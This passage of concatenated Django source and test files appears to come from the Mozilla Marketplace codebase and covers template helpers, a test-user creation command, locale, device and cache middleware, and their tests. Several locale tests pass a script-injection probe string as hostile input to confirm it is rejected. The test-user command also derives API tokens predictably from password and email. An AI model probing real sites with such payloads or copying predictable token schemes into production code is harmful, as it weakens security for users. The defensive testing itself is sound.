'categories': [unicode(cat.slug) for cat in
product.categories.all()],
'manifest_url': product.get_manifest_url(reviewer),
'recordUrl': urlparams(receipt_url, src=src),
'tokenUrl': token_url,
'author': author,
'author_url': author_url,
'iconUrl': product.get_icon_url(64),
'is_packaged': product.is_packaged,
'src': src
}
# Add in previews to the dict.
if product.all_previews:
previews = []
for p in product.all_previews:
preview = {
'fullUrl': jinja2.escape(p.image_url),
'type': jinja2.escape(p.filetype),
'thumbUrl': jinja2.escape(p.thumbnail_url),
}
previews.append(preview)
ret.update({'previews': previews})
if product.premium:
ret.update({
'price': product.get_price(region=request.REGION.id),
'priceLocale': product.get_price_locale(region=request.REGION.id),
})
if request.amo_user:
ret['isPurchased'] = purchased
# Jinja2 escape everything except this whitelist so that bool is retained
# for the JSON encoding.
wl = ('categories', 'currencies', 'isPurchased', 'is_packaged', 'previews',
'price', 'priceLocale')
return dict([k, jinja2.escape(v) if k not in wl else v]
for k, v in ret.items())
@register.function
@jinja2.contextfunction
def mkt_breadcrumbs(context, product=None, items=None, crumb_size=40,
add_default=True, cls=None):
"""
Wrapper function for ``breadcrumbs``.
**items**
list of [(url, label)] to be inserted after Add-on.
**product**
Adds the App/Add-on name to the end of the trail. If items are
specified then the App/Add-on will be linked.
**add_default**
Prepends trail back to home when True. Default is True.
"""
if add_default:
crumbs = [(reverse('home'), _('Home'))]
else:
crumbs = []
if product:
if items:
url_ = product.get_detail_url()
else:
# The Product is the end of the trail.
url_ = None
crumbs += [(None, _('Apps')), (url_, product.name)]
if items:
crumbs.extend(items)
if len(crumbs) == 1:
crumbs = []
crumbs = [(u, truncate(label, crumb_size)) for (u, label) in crumbs]
t = env.get_template('site/helpers/breadcrumbs.html').render(
{'breadcrumbs': crumbs, 'cls': cls})
return jinja2.Markup(t)
@register.function
def form_field(field, label=None, tag='div', req=None, opt=False, hint=False,
tooltip=False, some_html=False, cc_startswith=None, cc_for=None,
cc_maxlength=None, grid=False, cls=None, validate=False):
attrs = {}
# Add a `required` attribute so we can do form validation.
# TODO(cvan): Write tests for kumar some day.
if validate and field.field.required:
attrs['required'] = ''
c = dict(field=field, label=label or field.label, tag=tag, req=req,
opt=opt, hint=hint, tooltip=tooltip, some_html=some_html,
cc_startswith=cc_startswith, cc_for=cc_for,
cc_maxlength=cc_maxlength, grid=grid, cls=cls, attrs=attrs)
t = env.get_template('site/helpers/simple_field.html').render(c)
return jinja2.Markup(t)
@register.function
def grid_field(field, label=None, tag='div', req=None, opt=False, hint=False,
some_html=False, cc_startswith=None, cc_maxlength=None,
validate=False):
return form_field(field, label, tag, req, opt, hint, some_html,
cc_startswith, cc_maxlength, grid=True,
validate=validate)
@register.filter
@jinja2.contextfilter
def timelabel(context, time):
t = env.get_template('site/helpers/timelabel.html').render({'time': time})
return jinja2.Markup(t)
@register.function
def mkt_admin_site_links():
return {
'addons': [
('Fake mail', reverse('zadmin.mail')),
],
'users': [
('Configure groups', reverse('admin:access_group_changelist')),
],
'settings': [
('View site settings', reverse('zadmin.settings')),
('Django admin pages', reverse('zadmin.home')),
],
'tools': [
('View request environment', reverse('amo.env')),
('View elasticsearch settings', reverse('zadmin.elastic')),
('Purge data from memcache', reverse('zadmin.memcache')),
('Purge pages from zeus', reverse('zadmin.hera')),
('Generate error', reverse('zadmin.generate-error')),
('Site Status', reverse('amo.monitor')),
('Force Manifest Re-validation',
reverse('zadmin.manifest_revalidation'))
],
}
@register.filter
def external_href(url):
t = 'target="_blank" href="%s"' % get_outgoing_url(unicode(url))
return jinja2.Markup(t)
@register.filter
def more_button(pager):
t = env.get_template('site/paginator.html')
return jinja2.Markup(t.render({'pager': pager}))
@register.function
@jinja2.contextfunction
def get_doc_template(context, template):
lang = getattr(context['request'], 'LANG', 'en-US')
if lang in settings.AMO_LANGUAGES:
try:
template = env.get_template('%s/%s.html' % (template, lang))
except jinja2.TemplateNotFound:
pass
else:
return jinja2.Markup(template.render())
template = env.get_template('%s/en-US.html' % template)
return jinja2.Markup(template.render())
@register.function
@jinja2.contextfunction
def get_doc_path(context, path, extension):
"""
Gets the path to a localizable document in the current language with
fallback to en-US.
"""
lang = getattr(context['request'], 'LANG', 'en-US')
if lang in settings.AMO_LANGUAGES:
try:
localized_file_path = '%s/%s.%s' % (path, lang, extension)
with open(localized_file_path):
return localized_file_path
except IOError:
return '%s/en-US.%s' % (path, extension)
########NEW FILE########
__FILENAME__ = add_test_users
import hashlib
from datetime import datetime
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand
from django.db import transaction
import amo
from access.models import Group, GroupUser
from apps.users.models import UserProfile
from mkt.api.models import Access
@transaction.commit_on_success
def create_user(email, password, group_name=None, overwrite=False):
"""Create an user if he doesn't exist already, assign him to a group and
create a token for him.
On token creation, we generate the token key and the token secret. Each of
them are generated in a predictible way: sha512(password + email + 'key')
or sha512(password + email + 'secret').
"""
# Create the user.
profile, created = UserProfile.objects.get_or_create(
username=email, email=email, source=amo.LOGIN_SOURCE_UNKNOWN,
display_name=email)
if created:
profile.create_django_user()
if not profile.read_dev_agreement:
profile.read_dev_agreement = datetime.now()
profile.save()
# Now, find the group we want.
if (group_name and not
profile.groups.filter(groupuser__group__name=group_name).exists()):
group = Group.objects.get(name=group_name)
GroupUser.objects.create(group=group, user=profile)
# We also want to grant these users access, so let's create tokens for
# them.
if overwrite:
Access.objects.filter(user=profile.user).delete()
if not Access.objects.filter(user=profile.user).exists():
key = hashlib.sha512(password + email + 'key').hexdigest()
secret = hashlib.sha512(password + email + 'secret').hexdigest()
Access.objects.create(key=key, secret=secret, user=profile.user)
class Command(BaseCommand):
help = """Create users with different profiles (App Review, Admin,
Developer, End User)
"""
option_list = BaseCommand.option_list + (
make_option(
'--clear', action='store_true', dest='clear', default=False,
help='Clear the user access tokens before recreating them'),)
def handle(self, *args, **kw):
options = {'password': settings.API_PASSWORD}
if kw['clear']:
options['overwrite'] = True
create_user('[email protected]', group_name='App Reviewers',
**options)
create_user('[email protected]', group_name='Admins', **options)
create_user('[email protected]', **options)
create_user('[email protected]', **options)
########NEW FILE########
__FILENAME__ = messages
import jinja2
from jingo import env
from tower import ugettext as _
from amo.messages import debug, info, success, warning, error
def _make_message(message=None, title=None, title_safe=False,
message_safe=False):
c = {'title': title, 'message': message,
'title_safe': title_safe, 'message_safe': message_safe}
t = env.get_template('site/messages/content.html').render(c)
return jinja2.Markup(t)
def form_errors(request):
return error(request, title=_('Errors Found'),
message=_('There were errors in the changes you made. '
'Please correct them and resubmit.'))
########NEW FILE########
__FILENAME__ = middleware
from types import MethodType
from django import http
from django.conf import settings
from django.http import HttpRequest, SimpleCookie
from django.utils.cache import (get_max_age, patch_cache_control,
patch_response_headers, patch_vary_headers)
import tower
from django_statsd.clients import statsd
import amo
from amo.urlresolvers import lang_from_accept_header, Prefixer
from amo.utils import urlparams
import mkt
import mkt.constants
def _set_cookie(self, key, value='', max_age=None, expires=None, path='/',
domain=None, secure=False):
self._resp_cookies[key] = value
self.COOKIES[key] = value
if max_age is not None:
self._resp_cookies[key]['max-age'] = max_age
if expires is not None:
self._resp_cookies[key]['expires'] = expires
if path is not None:
self._resp_cookies[key]['path'] = path
if domain is not None:
self._resp_cookies[key]['domain'] = domain
if secure:
self._resp_cookies[key]['secure'] = True
def _delete_cookie(self, key, path='/', domain=None):
self.set_cookie(key, max_age=0, path=path, domain=domain,
expires='Thu, 01-Jan-1970 00:00:00 GMT')
try:
del self.COOKIES[key]
except KeyError:
pass
class RequestCookiesMiddleware(object):
"""
Allows setting and deleting of cookies from requests in exactly the same
way as we do for responses.
>>> request.set_cookie('name', 'value')
The `set_cookie` and `delete_cookie` are exactly the same as the ones
built into Django's `HttpResponse` class.
I had a half-baked cookie middleware (pun intended), but then I stole this
from Paul McLanahan: http://paulm.us/post/1660050353/cookies-for-django
"""
def process_request(self, request):
request._resp_cookies = SimpleCookie()
request.set_cookie = MethodType(_set_cookie, request, HttpRequest)
request.delete_cookie = MethodType(_delete_cookie, request,
HttpRequest)
def process_response(self, request, response):
if getattr(request, '_resp_cookies', None):
response.cookies.update(request._resp_cookies)
return response
class RedirectPrefixedURIMiddleware(object):
"""
Strip /<app>/ prefix from URLs.
Redirect /<lang>/ URLs to ?lang=<lang> so `LocaleMiddleware`
can then set a cookie.
Redirect /<region>/ URLs to ?region=<lang> so `RegionMiddleware`
can then set a cookie.
If it's calling /api/ which uses none of the above, then mark that on
the request.
"""
def process_request(self, request):
request.API = False
request.APP = amo.FIREFOX
path_ = request.get_full_path()
new_path = None
new_qs = {}
lang, app, rest = Prefixer(request).split_path(path_)
if app:
# Strip /<app> from URL.
new_path = rest
if lang:
# Strip /<lang> from URL.
if not new_path:
new_path = rest
new_qs['lang'] = lang.lower()
region, _, rest = path_.lstrip('/').partition('/')
region = region.lower()
if region == 'api':
# API isn't a region, its a sign that you are using the api.
request.API = True
if region in mkt.regions.REGION_LOOKUP:
# Strip /<region> from URL.
if not new_path:
new_path = rest
new_qs['region'] = mkt.regions.REGION_LOOKUP[region].slug
if new_path is not None:
if not new_path or new_path[0] != '/':
new_path = '/' + new_path
# TODO: Make this a 301 when we enable region stores in prod.
return http.HttpResponseRedirect(urlparams(new_path, **new_qs))
def get_accept_language(request):
a_l = request.META.get('HTTP_ACCEPT_LANGUAGE', '')
return lang_from_accept_header(a_l)
class LocaleMiddleware(object):
"""Figure out the user's locale and store it in a cookie."""
def process_request(self, request):
a_l = get_accept_language(request)
lang, ov_lang = a_l, ''
stored_lang, stored_ov_lang = '', ''
remembered = request.COOKIES.get('lang')
if remembered:
chunks = remembered.split(',')[:2]
stored_lang = chunks[0]
try:
stored_ov_lang = chunks[1]
except IndexError:
pass
if stored_lang.lower() in settings.LANGUAGE_URL_MAP:
lang = stored_lang
if stored_ov_lang.lower() in settings.LANGUAGE_URL_MAP:
ov_lang = stored_ov_lang
if 'lang' in request.REQUEST:
# `get_language` uses request.GET['lang'] and does safety checks.
ov_lang = a_l
lang = Prefixer(request).get_language()
elif a_l != ov_lang:
# Change if Accept-Language differs from Overridden Language.
lang = a_l
ov_lang = ''
# Update cookie if values have changed.
if lang != stored_lang or ov_lang != stored_ov_lang:
request.LANG_COOKIE = ','.join([lang, ov_lang])
if (getattr(request, 'amo_user', None)
and request.amo_user.lang != lang):
request.amo_user.lang = lang
request.amo_user.save()
request.LANG = lang
tower.activate(lang)
def process_response(self, request, response):
# We want to change the cookie, but didn't have the response in
# process request.
if (hasattr(request, 'LANG_COOKIE') and
not getattr(request, 'API', False)):
response.set_cookie('lang', request.LANG_COOKIE)
if request.REQUEST.get('vary') == '0':
del response['Vary']
else:
patch_vary_headers(response, ['Accept-Language', 'Cookie'])
return response
class DeviceDetectionMiddleware(object):
"""If the user has flagged that they are on a device. Store the device."""
devices = ['mobile', 'gaia', 'tablet']
def process_request(self, request):
dev = request.GET.get('dev')
if dev:
setattr(request, 'MOBILE', dev == 'android')
setattr(request, 'GAIA', dev == 'firefoxos')
setattr(request, 'TABLET', dev == 'desktop')
return
# TODO: These are deprecated, remove them. Update the docs (and API
# docs).
for device in self.devices:
# The XMobility middleware might have already set this.
if getattr(request, device.upper(), False):
continue
qs = request.GET.get(device, False)
cookie = request.COOKIES.get(device, False)
# If the qs is True or there's a cookie set the device. But not if
# the qs is False.
if qs == 'true' or (cookie and not qs == 'false'):
setattr(request, device.upper(), True)
continue
# Otherwise set to False.
setattr(request, device.upper(), False)
def process_response(self, request, response):
for device in self.devices:
active = getattr(request, device.upper(), False)
cookie = request.COOKIES.get(device, False)
if not active and cookie:
# If the device isn't active, but there is a cookie, remove it.
response.delete_cookie(device)
elif active and not cookie and not getattr(request, 'API', False):
# Set the device if it's active and there's no cookie.
response.set_cookie(device, 'true')
return response
class DoNotTrackTrackingMiddleware(object):
"""A small middleware to record DNT counts."""
def process_request(self, request):
if 'HTTP_DNT' not in request.META:
statsd.incr('z.mkt.dnt.unset')
elif request.META.get('HTTP_DNT') == '1':
statsd.incr('z.mkt.dnt.on')
else:
statsd.incr('z.mkt.dnt.off')
class CacheHeadersMiddleware(object):
"""
Unlike the `django.middleware.cache` middlewares, this middleware
simply sets the `Cache-Control`, `ETag`, `Expires`, and `Last-Modified`
headers and doesn't do any caching of the response object.
"""
allowed_methods = ('GET', 'HEAD', 'OPTIONS')
allowed_statuses = (200,)
def process_response(self, request, response):
if (request.method in self.allowed_methods and
response.status_code in self.allowed_statuses and
request.REQUEST.get('cache') == '1'):
timeout = get_max_age(response)
if timeout is None:
timeout = settings.CACHE_MIDDLEWARE_SECONDS or 0
if timeout != 0:
# Only if max-age is 0 should we bother with caching.
patch_response_headers(response, timeout)
patch_cache_control(response, must_revalidate=True)
return response
########NEW FILE########
__FILENAME__ = models
class DynamicBoolFieldsMixin(object):
def _fields(self):
"""Returns array of all field names starting with 'has'."""
return [f.name for f in self._meta.fields if f.name.startswith('has')]
def to_dict(self):
return dict((f, getattr(self, f)) for f in self._fields())
def to_keys(self):
return [k for k, v in self.to_dict().iteritems() if v]
def to_list(self):
keys = self.to_keys()
# Strip `has_` from each feature.
field_names = [self.field_source[key[4:].upper()]['name']
for key in keys]
return sorted(field_names)
########NEW FILE########
__FILENAME__ = test_forms
import mock
from nose.tools import eq_
import amo.tests
from users.models import UserProfile
from mkt.site.fixtures import fixture
from mkt.site.forms import AbuseForm, PotatoCaptchaForm
class PotatoCaptchaTestCase(amo.tests.TestCase):
def setUp(self):
self.request = mock.Mock()
self.request.META = {}
self.request.user = mock.Mock()
self.context = {'request': self.request}
self.request.user.is_authenticated = lambda: False
self.data = {'tuber': '', 'sprout': 'potato'}
class TestPotatoCaptchaForm(PotatoCaptchaTestCase):
fixtures = fixture('user_999')
def test_success_authenticated(self):
self.request.user = UserProfile.objects.get(id=999)
self.request.user.is_authenticated = lambda: True
form = PotatoCaptchaForm({}, request=self.request)
eq_(form.is_valid(), True)
def test_success_anonymous(self):
data = {'tuber': '', 'sprout': 'potato'}
form = PotatoCaptchaForm(data, request=self.request)
eq_(form.is_valid(), True)
def test_error_anonymous_bad_tuber(self):
data = {'tuber': 'HAMMMMMMMMMMMMM', 'sprout': 'potato'}
form = PotatoCaptchaForm(data, request=self.request)
eq_(form.is_valid(), False)
def test_error_anonymous_bad_sprout(self):
data = {'tuber': 'HAMMMMMMMMMMMMM', 'sprout': ''}
form = PotatoCaptchaForm(data, request=self.request)
eq_(form.is_valid(), False)
def test_error_anonymous_bad_tuber_and_sprout(self):
form = PotatoCaptchaForm({}, request=self.request)
eq_(form.is_valid(), False)
class TestAbuseForm(PotatoCaptchaTestCase):
def setUp(self):
self.request = mock.Mock()
self.data = {'tuber': '', 'sprout': 'potato', 'text': 'test'}
def test_success(self):
form = AbuseForm(self.data, request=self.request)
eq_(form.is_valid(), True)
def test_error_text_required(self):
self.data['text'] = ''
form = AbuseForm(self.data, request=self.request)
eq_(form.is_valid(), False)
eq_(form.errors, {'text': [u'This field is required.']})
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
from django.conf import settings
import fudge
import mock
import amo
import amo.tests
from mkt.site.helpers import css, js
class TestCSS(amo.tests.TestCase):
@mock.patch.object(settings, 'TEMPLATE_DEBUG', True)
@fudge.patch('mkt.site.helpers.jingo_minify_helpers')
def test_dev_unminified(self, fake_css):
request = mock.Mock()
request.GET = {}
context = {'request': request}
# Should be called with `debug=True`.
fake_css.expects('css').with_args('mkt/devreg', False, True)
css(context, 'mkt/devreg')
@mock.patch.object(settings, 'TEMPLATE_DEBUG', False)
@fudge.patch('mkt.site.helpers.jingo_minify_helpers')
def test_prod_minified(self, fake_css):
request = mock.Mock()
request.GET = {}
context = {'request': request}
# Should be called with `debug=False`.
fake_css.expects('css').with_args('mkt/devreg', False, False)
css(context, 'mkt/devreg')
@mock.patch.object(settings, 'TEMPLATE_DEBUG', True)
@fudge.patch('mkt.site.helpers.jingo_minify_helpers')
def test_dev_unminified_overridden(self, fake_css):
request = mock.Mock()
request.GET = {'debug': 'true'}
context = {'request': request}
# Should be called with `debug=True`.
fake_css.expects('css').with_args('mkt/devreg', False, True)
css(context, 'mkt/devreg')
@mock.patch.object(settings, 'TEMPLATE_DEBUG', False)
@fudge.patch('mkt.site.helpers.jingo_minify_helpers')
def test_prod_unminified_overridden(self, fake_css):
request = mock.Mock()
request.GET = {'debug': 'true'}
context = {'request': request}
# Should be called with `debug=True`.
fake_css.expects('css').with_args('mkt/devreg', False, True)
css(context, 'mkt/devreg')
class TestJS(amo.tests.TestCase):
@mock.patch.object(settings, 'TEMPLATE_DEBUG', True)
@fudge.patch('mkt.site.helpers.jingo_minify_helpers')
def test_dev_unminified(self, fake_js):
request = mock.Mock()
request.GET = {}
context = {'request': request}
# Should be called with `debug=True`.
fake_js.expects('js').with_args('mkt/devreg', True, False, False)
js(context, 'mkt/devreg')
@mock.patch.object(settings, 'TEMPLATE_DEBUG', False)
@fudge.patch('mkt.site.helpers.jingo_minify_helpers')
def test_prod_minified(self, fake_js):
request = mock.Mock()
request.GET = {}
context = {'request': request}
# Should be called with `debug=False`.
fake_js.expects('js').with_args('mkt/devreg', False, False, False)
js(context, 'mkt/devreg')
@mock.patch.object(settings, 'TEMPLATE_DEBUG', True)
@fudge.patch('mkt.site.helpers.jingo_minify_helpers')
def test_dev_unminified_overridden(self, fake_js):
request = mock.Mock()
request.GET = {'debug': 'true'}
context = {'request': request}
# Should be called with `debug=True`.
fake_js.expects('js').with_args('mkt/devreg', True, False, False)
js(context, 'mkt/devreg')
@mock.patch.object(settings, 'TEMPLATE_DEBUG', False)
@fudge.patch('mkt.site.helpers.jingo_minify_helpers')
def test_prod_unminified_overridden(self, fake_js):
request = mock.Mock()
request.GET = {'debug': 'true'}
context = {'request': request}
# Should be called with `debug=True`.
fake_js.expects('js').with_args('mkt/devreg', True, False, False)
js(context, 'mkt/devreg')
########NEW FILE########
__FILENAME__ = test_middleware
import datetime
from django.conf import settings
from django.test.utils import override_settings
import mock
from dateutil.tz import tzutc
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo.tests
from users.models import UserProfile
from mkt.site.middleware import DeviceDetectionMiddleware
from mkt.site.fixtures import fixture
_langs = ['cs', 'de', 'en-US', 'es', 'fr', 'pt-BR', 'pt-PT']
@mock.patch.object(settings, 'LANGUAGES', [x.lower() for x in _langs])
class TestRedirectPrefixedURIMiddleware(amo.tests.TestCase):
def test_redirect_for_good_application(self):
for app in amo.APPS:
r = self.client.get('/%s/' % app)
self.assert3xx(r, '/', 302)
def test_redirect_for_bad_application(self):
r = self.client.get('/mosaic/')
eq_(r.status_code, 404)
def test_redirect_for_good_locale(self):
redirects = [
('/en-US/', '/?lang=en-us'),
('/pt-BR/', '/?lang=pt-br'),
('/pt-br/', '/?lang=pt-br'),
('/fr/', '/?lang=fr'),
('/es-PE/', '/?lang=es'),
]
for before, after in redirects:
r = self.client.get(before)
self.assert3xx(r, after, 302)
def test_preserve_qs_for_lang(self):
r = self.client.get('/pt-BR/firefox/privacy-policy?omg=yes')
self.assert3xx(r, '/privacy-policy?lang=pt-br&omg=yes', 302)
r = self.client.get('/pt-BR/privacy-policy?omg=yes')
self.assert3xx(r, '/privacy-policy?lang=pt-br&omg=yes', 302)
def test_switch_locale(self):
# Locale in URL prefix takes precedence.
r = self.client.get('/pt-BR/?lang=de')
self.assert3xx(r, '/?lang=pt-br', 302)
def test_no_locale(self):
r = self.client.get('/robots.txt')
eq_(r.status_code, 200)
r = self.client.get('/robots.txt?lang=fr')
eq_(r.status_code, 200)
def test_redirect_for_good_region(self):
redirects = [
('/restofworld/', '/?region=restofworld'),
('/worldwide/', '/?region=restofworld'),
('/br/', '/?region=br'),
('/us/', '/?region=us'),
('/BR/', '/?region=br'),
]
for before, after in redirects:
r = self.client.get(before)
self.assert3xx(r, after, 302)
def test_redirect_for_good_locale_and_region(self):
r = self.client.get('/en-US/br/developers/support?omg=yes',
follow=True)
# Can you believe this actually works?
self.assert3xx(r,
'/developers/support?lang=en-us®ion=br&omg=yes', 302)
def test_preserve_qs_for_region(self):
r = self.client.get('/br/developers/support?omg=yes')
self.assert3xx(r, '/developers/support?region=br&omg=yes', 302)
def test_switch_region(self):
r = self.client.get('/restofworld/?region=brazil')
self.assert3xx(r, '/?region=restofworld', 302)
def test_404_for_bad_prefix(self):
for url in ['/xxx', '/xxx/search/',
'/brazil/', '/BRAZIL/',
'/pt/?lang=de', '/pt-XX/brazil/']:
r = self.client.get(url)
got = r.status_code
eq_(got, 404, "For %r: expected '404' but got %r" % (url, got))
@mock.patch.object(settings, 'LANGUAGES', [x.lower() for x in _langs])
@mock.patch.object(settings, 'LANGUAGE_URL_MAP',
dict([x.lower(), x] for x in _langs))
class TestLocaleMiddleware(amo.tests.TestCase):
def test_accept_good_locale(self):
locales = [
('en-US', 'en-US', 'en-US,en-US'),
('pt-BR', 'pt-BR', 'pt-BR,en-US'),
('pt-br', 'pt-BR', None),
('fr', 'fr', 'fr,en-US'),
('es-PE', 'es', 'es,en-US'),
('fr', 'fr', 'fr,en-US'),
]
for locale, r_lang, c_lang in locales:
r = self.client.get('/robots.txt?lang=%s' % locale)
if c_lang:
eq_(r.cookies['lang'].value, c_lang)
else:
eq_(r.cookies.get('lang'), None)
eq_(r.context['request'].LANG, r_lang)
def test_accept_language_and_cookies(self):
# Your cookie tells me pt-BR but your browser tells me en-US.
self.client.cookies['lang'] = 'pt-BR,pt-BR'
r = self.client.get('/robots.txt')
eq_(r.cookies['lang'].value, 'en-US,')
eq_(r.context['request'].LANG, 'en-US')
# Your cookie tells me pt-br but your browser tells me en-US.
self.client.cookies['lang'] = 'pt-br,fr'
r = self.client.get('/robots.txt')
eq_(r.cookies['lang'].value, 'en-US,')
eq_(r.context['request'].LANG, 'en-US')
# Your cookie tells me pt-BR and your browser tells me pt-BR.
self.client.cookies['lang'] = 'pt-BR,pt-BR'
r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='pt-BR')
eq_(r.cookies.get('lang'), None)
eq_(r.context['request'].LANG, 'pt-BR')
# You explicitly changed to fr, and your browser still tells me pt-BR.
# So no new cookie!
self.client.cookies['lang'] = 'fr,pt-BR'
r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='pt-BR')
eq_(r.cookies.get('lang'), None)
eq_(r.context['request'].LANG, 'fr')
# You explicitly changed to fr, but your browser still tells me es.
# So make a new cookie!
self.client.cookies['lang'] = 'fr,pt-BR'
r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='es')
eq_(r.cookies['lang'].value, 'es,')
eq_(r.context['request'].LANG, 'es')
def test_ignore_bad_locale(self):
# Good? Store language.
r = self.client.get('/robots.txt?lang=fr')
eq_(r.cookies['lang'].value, 'fr,en-US')
# Bad? Reset language.
r = self.client.get('/robots.txt?lang=')
eq_(r.cookies['lang'].value, 'en-US,en-US')
# Still bad? Don't change language.
for locale in ('xxx', '<script>alert("ballin")</script>'):
r = self.client.get('/robots.txt?lang=%s' % locale)
eq_(r.cookies.get('lang'), None)
eq_(r.context['request'].LANG, settings.LANGUAGE_CODE)
# Good? Change language.
r = self.client.get('/robots.txt?lang=fr')
eq_(r.cookies['lang'].value, 'fr,en-US')
def test_already_have_cookie_for_bad_locale(self):
for locale in ('', 'xxx', '<script>alert("ballin")</script>'):
self.client.cookies['lang'] = locale
r = self.client.get('/robots.txt')
eq_(r.cookies['lang'].value, settings.LANGUAGE_CODE + ',')
eq_(r.context['request'].LANG, settings.LANGUAGE_CODE)
def test_no_cookie(self):
r = self.client.get('/robots.txt')
eq_(r.cookies['lang'].value, settings.LANGUAGE_CODE + ',')
eq_(r.context['request'].LANG, settings.LANGUAGE_CODE)
def test_no_api_cookie(self):
res = self.client.get('/api/v1/apps/schema/?region=restofworld',
HTTP_ACCEPT_LANGUAGE='de')
ok_(not res.cookies)
def test_cookie_gets_set_once(self):
r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='de')
eq_(r.cookies['lang'].value, 'de,')
# Since we already made a request above, we should remember the lang.
r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='de')
eq_(r.cookies.get('lang'), None)
def test_accept_language(self):
locales = [
('', settings.LANGUAGE_CODE),
('de', 'de'),
('en-us, de', 'en-US'),
('en-US', 'en-US'),
('fr, en', 'fr'),
('pt-XX, xx, yy', 'pt-PT'),
('pt', 'pt-PT'),
('pt, de', 'pt-PT'),
('pt-XX, xx, de', 'pt-PT'),
('pt-br', 'pt-BR'),
('pt-BR', 'pt-BR'),
('xx, yy, zz', settings.LANGUAGE_CODE),
('<script>alert("ballin")</script>', settings.LANGUAGE_CODE),
('en-us;q=0.5, de', 'de'),
('es-PE', 'es'),
]
for given, expected in locales:
r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE=given)
got = r.cookies['lang'].value
eq_(got, expected + ',',
'For %r: expected %r but got %r' % (given, expected, got))
got = r.context['request'].LANG
eq_(got, expected,
'For %r: expected %r but got %r' % (given, expected, got))
self.client.cookies.clear()
def test_accept_language_takes_precedence_over_previous_request(self):
r = self.client.get('/robots.txt')
eq_(r.cookies['lang'].value, settings.LANGUAGE_CODE + ',')
# Even though you remembered my previous language, I've since
# changed it in my browser, so let's respect that.
r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='fr')
eq_(r.cookies['lang'].value, 'fr,')
def test_accept_language_takes_precedence_over_cookie(self):
self.client.cookies['lang'] = 'pt-BR'
r = self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='fr')
eq_(r.cookies['lang'].value, 'fr,')
@mock.patch.object(settings, 'LANGUAGES', [x.lower() for x in _langs])
@mock.patch.object(settings, 'LANGUAGE_URL_MAP',
dict([x.lower(), x] for x in _langs))
class TestLocaleMiddlewarePersistence(amo.tests.TestCase):
fixtures = fixture('user_999')
def test_save_lang(self):
self.client.login(username='[email protected]', password='password')
self.client.get('/robots.txt', HTTP_ACCEPT_LANGUAGE='de')
eq_(UserProfile.objects.get(pk=999).lang, 'de')
class TestVaryMiddleware(amo.tests.TestCase):
fixtures = fixture('user_999')
def test_vary_headers(self):
vary = lambda res: [x.strip() for x in res.get('Vary', '').split(',')]
# What is expected to `Vary`.
res = self.client.get('/privacy-policy')
eq_(res['Vary'], 'Accept-Language, Cookie')
res = self.client.get('/privacy-policy', follow=True)
eq_(res['Vary'], 'Accept-Language, Cookie')
res = self.client.get('/api/v1/services/config/site/?vary=1')
# DRF adds `Vary: Accept` by default, so let's not check that.
assert 'Accept-Language' in vary(res), (
'Expected "Vary: Accept-Language"')
assert 'Cookie' in vary(res), 'Expected "Vary: Cookie"'
res = self.client.get('/api/v1/services/config/site/?vary=0')
assert 'Accept-Language' not in vary(res), (
'Should not contain "Vary: Accept-Language"')
assert 'Cookie' not in vary(res), 'Should not contain "Vary: Cookie"'
# Patching MIDDLEWARE_CLASSES because other middleware tweaks vary headers.
@mock.patch.object(settings, 'MIDDLEWARE_CLASSES', [
'amo.middleware.CommonMiddleware',
'amo.middleware.NoVarySessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'mkt.site.middleware.RequestCookiesMiddleware',
'mkt.site.middleware.LocaleMiddleware',
'mkt.regions.middleware.RegionMiddleware',
'mkt.site.middleware.DeviceDetectionMiddleware',
])
def test_no_user_agent(self):
# We've toggled the middleware to not rewrite the application and also
# not vary headers based on User-Agent.
self.client.login(username='[email protected]', password='password')
r = self.client.get('/robots.txt', follow=True)
eq_(r.status_code, 200)
assert 'firefox' not in r.request['PATH_INFO'], (
'Application should not be in the request URL.')
assert 'User-Agent' not in r['Vary'], (
'User-Agent should not be in the "Vary" header.')
class TestDeviceMiddleware(amo.tests.TestCase):
devices = ['mobile', 'gaia']
def test_no_effect(self):
r = self.client.get('/robots.txt', follow=True)
for device in self.devices:
assert not r.cookies.get(device)
assert not getattr(r.context['request'], device.upper())
def test_dev_firefoxos(self):
req = self.client.get('/robots.txt?dev=firefoxos', follow=True)
eq_(req.cookies['gaia'].value, 'true')
assert getattr(req.context['request'], 'GAIA')
def test_dev_android(self):
req = self.client.get('/robots.txt?dev=android', follow=True)
eq_(req.cookies['mobile'].value, 'true')
assert getattr(req.context['request'], 'MOBILE')
def test_dev_tablet(self):
req = self.client.get('/robots.txt?dev=desktop', follow=True)
eq_(req.cookies['tablet'].value, 'true')
assert getattr(req.context['request'], 'TABLET')
def test_force(self):
for device in self.devices:
r = self.client.get('/robots.txt?%s=true' % device, follow=True)
eq_(r.cookies[device].value, 'true')
assert getattr(r.context['request'], device.upper())
def test_force_unset(self):
for device in self.devices:
r = self.client.get('/robots.txt?%s=true' % device, follow=True)
assert r.cookies.get(device)
r = self.client.get('/robots.txt?%s=false' % device, follow=True)
eq_(r.cookies[device].value, '')
assert not getattr(r.context['request'], device.upper())
def test_persists(self):
for device in self.devices:
r = self.client.get('/robots.txt?%s=true' % device, follow=True)
assert r.cookies.get(device)
r = self.client.get('/robots.txt', follow=True)
assert getattr(r.context['request'], device.upper())
def test_xmobile(self):
rf = RequestFactory().get('/robots.txt')
for state in [True, False]:
rf.MOBILE = state
DeviceDetectionMiddleware().process_request(rf)
eq_(rf.MOBILE, state)
class TestCacheHeadersMiddleware(amo.tests.TestCase):
seconds = 60 * 2
def _test_headers_set(self, res):
eq_(res['Cache-Control'],
'must-revalidate, max-age=%s' % self.seconds)
assert res.has_header('ETag'), 'Missing ETag header'
now = datetime.datetime.now(tzutc())
self.assertCloseToNow(res['Expires'],
now=now + datetime.timedelta(seconds=self.seconds))
self.assertCloseToNow(res['Last-Modified'], now=now)
def _test_headers_missing(self, res):
assert res.has_header('ETag'), 'Missing ETag header'
for header in ['Cache-Control', 'Expires', 'Last-Modified']:
assert not res.has_header(header), (
